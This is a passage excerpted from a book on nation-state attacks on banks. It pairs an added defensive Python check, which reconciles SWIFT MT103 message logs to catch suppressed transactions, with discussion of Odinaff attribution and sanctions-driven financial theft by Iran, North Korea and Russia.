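As an added example (not from the book, and not the Odinaff attackers’ code), the check below shows how a bank could catch this kind of suppression by reconciling two independent message records: what the messaging interface recorded versus what operators were actually shown. The MT103-style messages, references, accounts and amounts are constructed, and the existence of the two logs is an assumption.

```python
import re
from dataclasses import dataclass

# Field regex: ":<tag>:" followed by a body that may span continuation lines
# (lines not starting with ':'), following the MT text-block convention.
FIELD_RE = re.compile(r":(\d{2}[A-Z]?):([^\n]*(?:\n(?!:)[^\n]*)*)")

@dataclass(frozen=True)
class Msg:
    ref: str         # :20: transaction reference
    value_date: str  # YYMMDD from :32A:
    currency: str
    amount: str
    account: str     # beneficiary account from :59:

def parse_mt103(text: str) -> Msg:
    """Parse the handful of MT103 fields that suppression logic keys on."""
    fields = {tag: body.strip() for tag, body in FIELD_RE.findall(text)}
    m = re.fullmatch(r"(\d{6})([A-Z]{3})([\d,.]+)", fields["32A"])
    if m is None:
        raise ValueError(f"bad :32A: field in {fields.get('20')}")
    account = fields["59"].splitlines()[0].lstrip("/")
    return Msg(fields["20"], m.group(1), m.group(2), m.group(3), account)

def find_suppressed(interface_log, displayed_log):
    """Messages recorded by the interface but never shown to operators.

    A message that exists upstream yet never reached the confirmation
    queue is the footprint the suppression described above leaves,
    whatever date/account criteria the malware used to pick it.
    """
    shown = {parse_mt103(t).ref for t in displayed_log}
    return [m for m in map(parse_mt103, interface_log) if m.ref not in shown]

# Constructed sample messages (made-up references, accounts and amounts).
INTERFACE_LOG = [
    ":20:TX0001\n:32A:160205USD1500000,\n:59:/GB29NWBK60161331926819\nACME LTD\n",
    ":20:TX0002\n:32A:160205EUR250000,\n:59:/FR7630006000011234567890189\nEXAMPLE SA\n",
    ":20:TX0003\n:32A:160205USD81000000,\n:59:/DE89370400440532013000\nSHELL CO\n",
]
# What the operators' confirmation printer/screen showed: TX0003 never appeared.
DISPLAYED_LOG = [INTERFACE_LOG[0], INTERFACE_LOG[1]]

if __name__ == "__main__":
    for msg in find_suppressed(INTERFACE_LOG, DISPLAYED_LOG):
        print(f"SUPPRESSED {msg.ref}: {msg.currency} {msg.amount} "
              f"to {msg.account} on {msg.value_date}")
```

The reconciliation only works if the two records are kept on separately controlled systems; a copy maintained on the same compromised host can be edited by the same malware.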
While no cybersecurity officials have established solid attribution, several clues point to attacker ties to Russia. Strings present in the malware, as well as folder names, consisted of Cyrillic characters; additionally, some speculated that a relationship existed between the Odinaff attackers and the Carbanak malware attacks.
Carbanak is the tool of choice of a cybercriminal gang, also referred to as Carbanak, that has targeted large corporations for financial gain since at least 2014. The Carbanak gang has been the subject of both media and security reporting due to their high-profile attacks.[43] The North Korean attacks and the Russia-based Odinaff attacks were so similar that, when initially discovered, investigators believed the heist originated from the same North Korean attackers responsible for the previous SWIFT-related attacks.
They soon realized that was not the case, but this serves as another example of why investigators cannot let opinion dictate attribution; they must follow the evidence. While the Odinaff attackers were successful—they were one of a few cybercriminal groups to steal money from financial institutions themselves as opposed to their customers—they did not enjoy the same monetary success as nation-state attackers.
Conclusion
Nation-state financial theft wasn’t a problem for banks prior to the 21st century. Unfortunately, since 2009, nation-state attackers, including those from Iran, North Korea and Russia, have conducted attacks that include sabotage, financial theft and denial of service against banks all over the world. The attacking nations have been under sanctions, and those sanctions in turn motivated the attacks.
For example, North Korea and Iran are under sanctions for developing and testing nuclear weapons. The measures in place restrict economic growth in order to pressure both countries to halt their military development of nuclear weapons. Yet the funds obtained through financial theft often offset this monetary loss, allowing these nations to continue building their military power.
In addition to economic motivation, Iran and North Korea conduct attacks to project power in the public eye and to retaliate against alleged U.S.-based or allied cyber operations.[43] Attacking financial institutions for substantial monetary gains and with large-scale DoS and sabotage attacks sends a message to the government in which the victim banks reside.
Other nations, like Russia, have been sanctioned for military activities as well, just not for those involving nuclear weapons. While not discussed here, Russian attackers usually target financial institutions for retribution purposes and to cause economic turmoil in the targeted nation. The impact of cyberattacks magnifies when bank customers cannot access their money, resulting in negative media attention for the victim organizations.
This media coverage causes embarrassment to banks and often results in a loss of customers who may feel their money is no longer safe. It is plausible that in a country with a weakened economy, this type of attack could impact its overall economic posture. While these attacks might sound like plots from spy movies, bear in mind that they actually took place, demonstrating the danger that nation-states pose to financial institutions. Nation-state attackers are possibly the most dangerous and impactful threats that financial institutions face today. While nation-state attacks are rare, the monetary loss from a single attack is far greater than that from traditional cyberattacks. For these reasons, organizations need to handle and respond to them differently, as simply blocking or mitigating the initial threat will not stop this type of attacker.
Excerpted from The Art of Cyberwarfare by Jon DiMaggio. Copyright © 2022 by Jon DiMaggio. Excerpted by permission of No Starch Press. All rights reserved. No part of this excerpt may be reproduced or reprinted without permission in writing from the publisher.